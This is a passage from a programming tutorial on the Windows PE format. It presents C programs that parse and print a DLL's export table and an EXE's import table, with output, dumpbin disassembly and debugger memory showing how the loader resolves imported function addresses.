name. If the name of the library is changed to e1.dll, the linker names the dll
as e1.dll. Then the keyword EXPORTS is specified followed by a list of
functions that are exported. Thereafter, the function names, i.e. xyz, aaa and
bbb are given.
The exported function of a dll can be
called using the Win32 API. The API either takes name of the function or its
ordinal number. This number is given after an @ following the name of the
function. Normally using an ordinal number is not advisable as it may vary from
one version of the dll to the other.
The function xyz is given an ordinal
number of 5 followed by an ordinal
number of 7 for the function aaa and 12 for bbb. If the ordinal number is not
specified, the system chooses a default beginning with 1 and then increasing it
sequentially.
The indentation is there for display
purposes only; most def files indent the function name also.
The exported functions in a dll are placed
in the exports section along with its location in the dll.
The program given below, displays the
exports data in the file e.dll.
#include <windows.h>
#include <stdio.h>
#include <time.h>
void main()
{
int i;
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
hfile =
CreateFile("e.dll",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
printf("pmappedfile=%p\n",pmappedfile);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
PIMAGE_SECTION_HEADER psectionheader;
psectionheader =
(PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader +
sizeof(IMAGE_OPTIONAL_HEADER));
DWORD
beginexportsrva,endexportsrva,diff,startoffile;
beginexportsrva =
pimageoptionalheader->DataDirectory[0].VirtualAddress;
endexportsrva = beginexportsrva +
pimageoptionalheader->DataDirectory[0].Size;
printf("beginexportsrva=%p
Size=%x endexportsrva=%p\n",beginexportsrva,pimageoptionalheader->DataDirectory[0].Size,endexportsrva);
printf("Sec No Name Virtual Address PointerToRawData
VirtualSize\n");
for ( i=0; i <
pimagefileheader->NumberOfSections; i++, psectionheader++ )
{
printf("%d %6s
%x %x %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);
if ( (beginexportsrva >=
psectionheader->VirtualAddress) && (endexportsrva <=
(psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))
break;
}
diff =
(INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);
printf("diff=%d
%x\n",diff,diff);
PIMAGE_EXPORT_DIRECTORY
pexportdirectory;
startoffile = (DWORD)pmappedfile;
pexportdirectory =
(PIMAGE_EXPORT_DIRECTORY)(startoffile + beginexportsrva - diff);
printf("pexportdirectory=%p\n",pexportdirectory);
char *nameoffile;
nameoffile = (PSTR)(pexportdirectory->Name - diff + startoffile);
printf("FileName:%s %x\n",
nameoffile,nameoffile);
printf("Characteristics:%08X\n",
pexportdirectory->Characteristics);
printf("TimeDateStamp:%08X
%s",pexportdirectory->TimeDateStamp,ctime((long
*)&pexportdirectory->TimeDateStamp));
printf("Version
Number:Major.Minor %u.%02u\n",
pexportdirectory->MajorVersion,pexportdirectory->MinorVersion);
printf("Ordinal Numbers Starting
From:%08X\n", pexportdirectory->Base);
printf("Number of
functions:%08X\n", pexportdirectory->NumberOfFunctions);
printf("Number of
Names:%08X\n", pexportdirectory->NumberOfNames);
printf("Address of functions array
rva=%08x\n",pexportdirectory->AddressOfFunctions);
printf("Address of names array
rva=%08x\n",pexportdirectory->AddressOfNames);
printf("Address of ordinals
array rva=%08x\n",pexportdirectory->AddressOfNameOrdinals);
long *pfunctionsactual;
short *pordinalsactual;
pfunctionsactual = (long
*)((int)pexportdirectory->AddressOfFunctions - diff + startoffile);
pordinalsactual = (short
*)((int)pexportdirectory->AddressOfNameOrdinals - diff + startoffile);
char **ppnamesactual;
ppnamesactual = (char **)((int)pexportdirectory->AddressOfNames
- diff + startoffile);
printf("\ni Entry Pt
Ordn Name\n");
for ( i=0; i <
pexportdirectory->NumberOfFunctions; i++ )
{
DWORD startoffunctionsrva =
pfunctionsactual[i];
DWORD j;
if ( startoffunctionsrva == 0 )
continue;
printf("%d %08X
%4u", i , startoffunctionsrva, i + pexportdirectory->Base );
for ( j=0; j <
pexportdirectory->NumberOfNames; j++ )
if ( pordinalsactual[j] == i )
printf(" %s", ppnamesactual[j] - diff +
startoffile);
if ( (startoffunctionsrva >=
beginexportsrva) && (startoffunctionsrva <= endexportsrva) )
printf(" (forwarder ->
%s)", startoffunctionsrva - diff + startoffile );
printf("\n");
}
printf("Array of Address of
Functions\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfFunctions; i++)
printf("%d
%08X\n",i,pfunctionsactual[i]);
printf("Array of
NameOrdinals\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfNames; i++)
printf("%d
%08X\n",i,pordinalsactual[i]);
printf("Names of
functions\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfNames; i++)
printf("%d %08X
%s\n",i,ppnamesactual[i] - diff + startoffile , ppnamesactual[i] - diff +
startoffile);
}
pmappedfile=00310000
beginexportsrva=00004710 Size=80
endexportsrva=00004790
Sec No Name Virtual Address PointerToRawData VirtualSize
0 .text 1000 1000 275e
1 .rdata 4000 4000 790
diff=0 0
pexportdirectory=00424710
FileName:e.dll 424776
Characteristics:00000000
TimeDateStamp:3FEBF2B2 Fri Dec 26
14:04:58 2003
Version Number:Major.Minor 0.00
Ordinal Numbers Starting
From:00000005
Number of functions:00000008
Number of Names:00000005
Address of functions array
rva=00004738
Address of names array rva=00004758
Address of ordinals array
rva=0000476c
i
Entry Pt Ordn Name
0 0000100A 5 xyz
1
00001000 6 abc
2
0000100F 7 aaa
3
00001005 8 pqr
7
00001014 12 bbb
Array of Address of Functions
0 0000100A
1 00001000
2 0000100F
3 00001005
4 00000000
5 00000000
6 00000000
7 00001014
Array of NameOrdinals
0 00000002
1 00000001
2 00000007
3 00000003
4 00000000
Names of functions
0 0042477C aaa
1 00424780 abc
2 00424784 bbb
3 00424788 pqr
4 0042478C xyz
The above program displays the
exports data section in the file e.dll.
The initial part of the program remains the same as before. Functions
like CreateFile, CreateFileMapping and MapViewOfFile loads the dll e.dll in
memory at memory location 310000. The start of a PE file contains a DOS header
that gives the location of the PE header. After the characters P,E,0,0 comes
the Image File header which is followed by the Image Optional header. The
optional header is followed by the section headers. These headers have been
explained earlier on except for the Optional header that has a series of structures with two members Virtual Address
and Virtual Size. The Virtual Address reports on the memory location of a
particular set of data i.e. its RVA and the Size member gives its size.
The first structure of the Data
Directory structure stores details on the exports information whereas the
second one is on the imports data. We
will limit our learning to these two structures for the time being.
The first DataDirectory structure
states that the exports section begins 4710 bytes from the start of the file
and its size is 80 bytes. Thus in effect, export data takes up only 80 bytes.
Also, 4710 is an RVA or an offset from the start of the file loaded in memory.
Remember the file on disk in not loaded in memory in the same manner as the map
functions. The file is broken up into sections and each section is loaded in
memory depending upon the section header.
It is for this reason, that we now
need to find out which section stores the exports data. The only way out is by
iterating through the section header and checking the section that contains the
RVA, which is 4710, the value stored in variable beginexportsrva. At the same
time, the section details are also displayed again.
In the if statement we check if the
variable beginexportsrva or the start of the exports rva is greater than or
equal to the VirtualAddress field, i.e the start of the section in memory. The
section also should be large enough to contain the export data. This is done by
checking the end of the exports data which must be less than or equal to the
VirtualAddress plus the size of the section.
The first section starts at an RVA of
1000 or 4096 bytes as the file starts with the PE header. Since the section
alignment is 4096 bytes, each section starts at a multiple of 4096 irrespective
of the size of the section data. The section called rdata starts at rva 0x4000
and has a size of 790 bytes, therefore it ends at 4790. This value is less than or equal to
endexportsrva which is the end of the exports data.
Since the if statement results in
true for the second section, the loop is terminated with the details of the
second section being stored in the psectionheader variable.
A variable called diff is computed to
be zero in the case of e.dll but for dll’s like kernel32.dll it will have a different
value which is 0xc00 as the exports data is found in the first section, loaded
in memory at 0x1000. Also, the pointer to raw data has a value of 0x400.
Thus on the disk, the export section
of kernel32 section will start at 0x400 from the start of the file but in
memory when the actual loader loads it, the section will be loaded at 0x1000.
As a result, since we are using the map functions to read the file, the value
of diff must be subtracted to arrive at right rva. The rva’s are always with respect
to the Virtual Address. The newer versions of the linkers give the rva and
pointer to raw data the same value.
The variable startoffile is made
equal to pmappedfile which has a value of 310000 and indicates the start of
file in memory. Then the actual start of the exports directory pexportdirectory
is computed. This is an rva and variable beginexportsrva is used which is
calculated with the help of start of the file stored in variable startoffile
minus the diff variable which for e.dll is zero. Thus the exports data is
stored at memory location 00424710.
This data is represented in a
structure that looks like Export Directory thus facilitating in the display of
some of its members.
The first member is the name of the
dll which is stored at memory location 424776. Then is a field called
Characteristics whose present value is zero. This is followed by the date time
stamp of a long datatype. This value can be converted to a string format using
the function called ctime. This is followed by the major and minor version
numbers which are also zero.
In the def file, the first function
xyz is given an ordinal number 5, the function aaa an ordinal number of 7 and
function bbb 12. The abc and pqr functions are not given any ordinal numbers.
Thus our ordinal number starting
point is 5 and as we have not given the abc function a ordinal number it is
given a value 6. The def file overrules everything and as the aaa function has
a ordinal number 7, the pqr function is given a ordinal number of 8 and finally
bbb 12.
Thus the def file decides the ordinal
numbers and the functions that do not have ordinal numbers are given the ones
in the middle. The Base member of the exports directory gives us the starting
point of the ordinal numbers, in our case 5. The next two members Number of
Functions and Number of names is normally the same.
The Number of functions member tells
us how many functions are to be exported. The Number of names gives us the
number of functions that are exported by name plus empty gaps. If you look at
the def file for e.dll, the last function is given a ordinal number of 12 and
the second last function pqr has a ordinal number of 8.
Thus the array NumberOfFunctions has
to have 3 empty members to account for the ordinal number 9, 10 and 11 that have
no functions. The Ordinal Number array has a many members as the last ordinal
number minus the ordinal base. Thus if we change the last functions bbb’s
ordinal number to 100, the Number of
functions will change to 96.
Each function that we export has
three bits of information associated with it. The first is the rva of where the
function starts in memory. Then its ordinal number and finally its name. Thus
in the exports directory we have three arrays which store the above data.
These arrays are called the
AddressOfFunctions, AddressOfNameOrdinals and finally the AddressOfNames. As we
may have only five exported functions, the size of this array is 32 bytes as
the other three members are zero to account for empty slots 9, 10 , 11. These
three arrays are stored back to back.
The first array AddressOfNames starts
00004738, followed by the array of functions at 00004758 which is 32 bytes
away. The third array starts 0000476c which is 20 bytes away as this array has
only 5 names as we have five functions to be exported. Thus the three array
sizes are not equal.
Now as always we want to convert
these numbers to our memory space and thus we create three new variables by
adding startoffile and subtracting diff. We have to now display the details of
the exported functions stored in these three arrays. We use the member
NumberOfFunctions to decide how long the
loop iterates. We first check if the AddressOfFunctions member is zero.
If yes we know that no such function
exists and thus go back to start of the loop. Remember there are no functions
for ordinal numbers 9, 10 and 11. These entries will have a value of zero. We
display the address of the function and then the ordinal number. The loop
variable I is added to the ordinal base to give us the ordinal number.
If this gets a little difficult we
have also displayed at the end of the program the contents of the three arrays.
The first array that gives us the address of the functions is decided by the last
ordinal number minus the ordinal base which in our case works out to 12 – 5 or
8.
The missing ordinal numbers have a
zero as the value. The first function has the ordinal number of the member
Ordinal Base and the next function, a ordinal number that is increased by 1.
Now starts the complication. The Name Ordinals array is not ordered at all and
contains the same number of members as the address of names.
So if we want to find the name of a
function with ordinal number 6 the function abc, we know that as it is the
second function, the value of I is 1. The loop variable is the ordinal number +
ordinal base. We thus scan the ordinal base array for a member whose value is 1
and not 6.
The values of the ordinal base array
are not the ordinal numbers but ordinal numbers minus ordinal base. The offset
in this Name Ordinal array gives us the
offset in the Names array. Thus the
system first stores the names of the functions in memory and the addresses of
these names in the Name Address array.
Then it fills up the Name Ordinal
array with the ordinals numbers corresponding with the names. Thus the first
member of the Names array contains the address of aaa and the Name Ordinal
array its ordinal number 7 – 5 or 2. The
last function in the Names array stores the address of xyz function and as its
ordinal number is 5, the last member of the Name ordinal array has a value of 5
– 5 i.e. 0.
The Address of Function array is
indexed on Ordinal Number minus ordinal base. If you have noticed the Names
array is sorted on the name of the function. Thus we first read the address of
the function, its index into the array is the ordinal number plus Ordinal Base.
We then find a corresponding value in the Name Ordinal array. This index gives
us the address of the name in the Address of Names array.
The Imports table.
d.c
#include <windows.h>
main()
{
MessageBox(0,"hi","bye",0);
MessageBox(0,"hi1","bye1",0);
GetDC(0);
ReleaseDC(0,0);
}
cl d.c user32.lib
Microsoft has given plenty of dlls
from where code can be easily picked up when writing any code. However, this
code does not physically get added to the exe file but instead, a list is
maintained of all dlls’s along with the functions used from them. This list is
called the imports section.
In the above exe file e.exe, three
functions are called from the dll user32.dll. Lets now display the import data
section stored in file e.exe.
b.cpp
#include <windows.h>
#include <stdio.h>
#include <time.h>
void main()
{
HANDLE hfile,hfile1;
int i;
unsigned char *pmappedfile, *dummy;
hfile =
CreateFile("d.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
PIMAGE_SECTION_HEADER psectionheader;
psectionheader =
(PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
DWORD importstartrva,importendrva;
importstartrva =
pimageoptionalheader->DataDirectory[1].VirtualAddress;
importendrva = importstartrva +
pimageoptionalheader->DataDirectory[1].Size;
printf("importstartrva=%x
size=%x\n",importstartrva,pimageoptionalheader->DataDirectory[1].Size);
printf("Section No Name Virtual Address PointerToRawData
VirtualSize\n");
for ( i=0; i <
pimagefileheader->NumberOfSections; i++, psectionheader++ )
{
printf("%2d %-7s %x %x %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);
if ( (importstartrva >= psectionheader->VirtualAddress)
&& (importstartrva < (psectionheader->VirtualAddress +
psectionheader->Misc.VirtualSize)))
break;
}
DWORD diff,startoffile;
diff =
(INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);
PIMAGE_IMPORT_DESCRIPTOR
pimportDescriptor;
startoffile = (DWORD)pmappedfile;
pimportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(startoffile
+ importstartrva - diff);
printf("psectionheader=%x
pimportDescriptor=%x\n",psectionheader , pimportDescriptor);
while ( 1 )
{
if (
(pimportDescriptor->TimeDateStamp==0 ) &&
(pimportDescriptor->Name==0) )
break;
printf("Name of Dll:%s\n",
pimportDescriptor->Name -diff + startoffile );
printf("Characteristics:%08X
(Unbound IAT)\n",pimportDescriptor->Characteristics);
printf("TimeDateStamp:%08X
%s",pimportDescriptor->TimeDateStamp,ctime((PLONG)&pimportDescriptor->TimeDateStamp));
printf("ForwarderChain:%08X\n",pimportDescriptor->ForwarderChain);
printf("First thunk
RVA:%08X\n",pimportDescriptor->FirstThunk);
PIMAGE_THUNK_DATA
pthunkdata,pthunkdatafirst;
long *pFirstThunk;
pthunkdata =
(PIMAGE_THUNK_DATA)pimportDescriptor->Characteristics;
pFirstThunk = (long
*)pimportDescriptor->FirstThunk;
pthunkdatafirst =
(PIMAGE_THUNK_DATA)pimportDescriptor->FirstThunk;
pthunkdatafirst =
(PIMAGE_THUNK_DATA)((DWORD)pthunkdatafirst - diff + startoffile);
pthunkdata = (PIMAGE_THUNK_DATA)((DWORD)pthunkdata
- diff + startoffile);
pFirstThunk = (long
*)((DWORD)pFirstThunk - diff + startoffile);
if (!pthunkdata)
return;
printf(" Ordn
Name\n");
while ( 1 )
{
if ( pthunkdata->u1.AddressOfData
== 0 )
break;
if ( pthunkdata->u1.Ordinal & IMAGE_ORDINAL_FLAG
)
{
printf( " %4u",
IMAGE_ORDINAL(pthunkdata->u1.Ordinal) );
}
else
{
PIMAGE_IMPORT_BY_NAME pimportbyname;
pimportbyname =
pthunkdata->u1.AddressOfData;
pimportbyname =
(PIMAGE_IMPORT_BY_NAME)((DWORD)pimportbyname - diff + startoffile);
printf(" %4u
%s Memory=%x Value=%x", pimportbyname->Hint,
pimportbyname->Name,pFirstThunk,*pFirstThunk);
}
if (
pimportDescriptor->TimeDateStamp )
printf( " (Bound to:
%08X)", pthunkdatafirst->u1.Function );
printf( "\n" );
pthunkdata++;
pFirstThunk++;
}
pimportDescriptor++;
printf("\n");
}
}
Output
importstartrva=4404 size=3c
Section No Name Virtual Address PointerToRawData
VirtualSize
0 .text 1000 1000
280e
1 .rdata 4000 4000
778
psectionheader=4201e8
pimportDescriptor=424404
Name of Dll:USER32.dll
Characteristics:000044D0 (Unbound
IAT)
TimeDateStamp:00000000 Thu Jan 01
05:30:00 1970
ForwarderChain:00000000
First thunk RVA:00004090
Ordn Name
515 ReleaseDC Memory=424090 Value=44e0
446 MessageBoxA Memory=424094
Value=44f4
253 GetDC Memory=424098
Value=44ec
Name of Dll:KERNEL32.dll
Characteristics:00004440 (Unbound
IAT)
TimeDateStamp:00000000 Thu Jan 01
05:30:00 1970
ForwarderChain:00000000
First thunk RVA:00004000
Ordn Name
413 HeapDestroy Memory=424000
Value=4654
411 HeapCreate Memory=424004
Value=4662
342 GetStringTypeW Memory=424008
Value=4758
339 GetStringTypeA Memory=42400c
Value=4746
202 GetCommandLineA
Memory=424010 Value=450e
The first half of the program remains
almost the same as in the exports program. Here, the 2nd member of
the Data Directory contains the rva and the size of the imports section. The
rva in our case is 4404 and its size 3c bytes.
The start and end of the imports data
is placed in variables importstartrva and importendrva. The section that
contains the imports data is the rdata section as before and the diff and
startoffile variables as initialized in the same manner as before. Nothing
changes. Thus the import data starts at location 424404.
The import data is made up of a
series of structures called the Import Descriptor structures. There is one
structure for each dll from where the code is imported. Also, every C program
imports code from kernel32.dll due to the startup code added by the compiler.
As a result, there are two such structures back to back in our import area, one
for user32 and the other for kernel32.
The end of the import area is denoted
by an Import Descriptor structure that has all its members zeroed out. Thus a
while loop is implemented which exits when the members are all zero. Here the
name and Date Time stamp field are checked to be zero for exit.
The Name of the dll is first displayed,
however it is a rva and hence the startoffile is to be added and diff is to be
subtracted like in the exports program. These variables are reset to their
actual values as initially they are simply rvas and they point to what are
called Image Thunk Data structures.
The Characteristics field that is not
zero is printed along with the Date Time and the Forwarder Chain which is zero.
The most crucial field is the field FirstThunk which is an rva having a value
of 0x4090.
Now either the fields Characteristics
or FirstThunk point to a series of structures that give the names of the
functions imported from this dll. The variable pthunkdata is initialized to
Characteristics and pthunkdatafirst to FirstThunk. Then again, it could so
happen that pthunkdata i.e. field Characteristics is zero. If the pthunkdata
member or Characteristics is zero the loop is terminated instantly.
Now to display the names of functions
called from one dll the loop is brought in. The pthunkdata which represents
the Characteristics field is nothing
but a pointer to a series of Image Thunk Data structures. Like the structures
representing dll’s, an empty Thunk Data structure denotes the end of function
names being called from this dll. Thus if the AddressOfData member is zero, the
inner loop is terminated. The if statement is not true generally therefore in
the else, the ordinal number and name are displayed in the else block. The
AddressOfData member points to an Image Import by name structure. Since it is
an rva its actual value is gathered and then two members Hint the ordinal
number and the Name of the function are displayed. The variable pthunkdata is
then incremented to point to the next structure. Once the inner while ends, the
variable pimportDescriptor variable is incremented in the outer while to point
to the next such structure.
The FirstThunk member in user32.dll
has a value of 4090, again an rvc. The variable pFirstThunk, which is a pointer
to a long, is set to this FirstThunk value after being converted to a actual
memory location. We display the variable for each function called from the dll
and also increment its value. The contents present in this memory are also
displayed.
The imports data gives a listing of
only the functions called from each dll. When we install Visual C++ we get a
program called dumpbin that displays the internals of a PE file.
Run dumpbin on d.exe as dumpbin
/DISASM d.exe. The DISASM option gives actually disassembles the code in our
exe file.
00401000: 55
push ebp
00401001: 8B EC
mov ebp,esp
00401003: 6A 00
push 0
00401005: 68 30 50 40 00
push 405030h
0040100A: 68 34 50 40 00
push 405034h
0040100F: 6A 00
push 0
00401011: FF 15 94 40 40 00
call dword ptr
ds:[00404094h]
00401017: 6A 00
push 0
00401019: 68 38 50 40 00
push 405038h
0040101E: 68 40 50 40 00
push 405040h
00401023: 6A 00
push 0
00401025: FF 15 94 40 40 00
call dword ptr
ds:[00404094h]
0040102B: 6A 00
push 0
0040102D: FF 15 98 40 40 00
call dword ptr
ds:[00404098h]
00401033: 6A 00
push 0
00401035: 6A 00
push 0
00401037: FF 15 90 40 40 00
call dword ptr
ds:[00404090h]
0040103D: 5D
pop ebp
0040103E: C3 ret
The first two calls are to the
MessageBoxA function. The compiler/linker combo however is not informed of the
address of the function MessageBoxA other than the fact that the library
user32.lib has the functions name and its ordinal number.
The address of the function in the
dll is not stored in the lib file. Even though the dll user32 is present on our
machine and the exports section will contain the address of the function
MessageBoxA, the linker does not bring in this address at all. Do remember that
the dll need not be present on the machine the program is being linked on, the
lib file suffices.
The functions address in the dll is
an rva from where the dll is loaded in memory.
Thus to get at the real addresses, it is important to know the location
of the dll in memory. Though, this information can be extracted by the linker,
it does not for the simple reason that the exe file may be compiled on one
machine and executed on another.
If that is the case, user32.dll may
be loaded somewhere else in memory and thus the absolute addresses of the
functions changes, even though its rva may be the same. Version to version of
the dll may store the function at a different place. The placement of a dll in
memory is decided by the operating system and it service pack. Thus it is the
job of the runtime loader to figure out the address of the function in memory.
Thus the absolute addresses of the
functions can never be determined. The second hurdle is that one function can
be called many times in a program like the printf or the MessageBox. There is
no way one would expect the loader to read the program code at runtime and
replace every occurrence of the call to say the MessageBoxA function with the
address of the function in memory on that machine. This would simply take too
long.
Thus when a program is executed, the
system does the normal sanity checks. In the disassembled code, the call to the
MessageBoxA function is an indirect call. The system is directed to go to
memory location 404094 and execute a function whose address is stored at that
location.
When the import table is displayed,
the FirstThunk member points to 404090, thus for MessageBoxA the value is
404094 as it is the second function. Thus to simplify matters for the loader,
all that it does at runtime is, reads the import section.
The Characteristics member gives it
the function name and ordinal number and the FirstThunk member gives it a
corresponding memory location, which is assumed to contain the address of that
function. Thus the loader figures out the address of MessageBoxA on a machine
and places that address at memory location 404094.
Thus it needs to do this only once
irrespective of the number of times the function is called. In the same vein at
memory location 404090 stores the address of the function ReleaseDC and 404098
GetDC.
To confirm this we add a breakpoint
interrupt in file d.c as follows.
d.c
#include <windows.h>
main()
{
int 3
MessageBox(0,"hi","bye",0);
MessageBox(0,"hi1","bye1",0);
GetDC(0);
ReleaseDC(0,0);
}
Running the above program transports
us to the debugger. In the memory window, the memory location of 00404090 is
given. The bytes shown are as follows.
Memory
00404090 7A 3A E1 77
00404094 D5 75 E3 77
00404098 6C 3A E1 77
Now run the program f.c which has the following.
f.c
#include <windows.h>
main()
{
printf("ReleaseDC=%x\n",ReleaseDC);
printf("MessageBox=%x\n",MessageBox);
printf("GetDC=%x\n",GetDC);
}
ReleaseDC=77e13a7a
MessageBox=77e375d5
GetDC=77e13a6c
This program discloses the address of the ReleaseDC function as 77e13a7a. At memory location 404090, the same value is stored but with the bytes in reverse order. The import table also shows the ReleaseDC function as its first member and the Disassembly shows the same value too. In the same vein the address of the MessageBoxA function is at 77e375d5 and it should be at location 404094. Ditto for GetDC.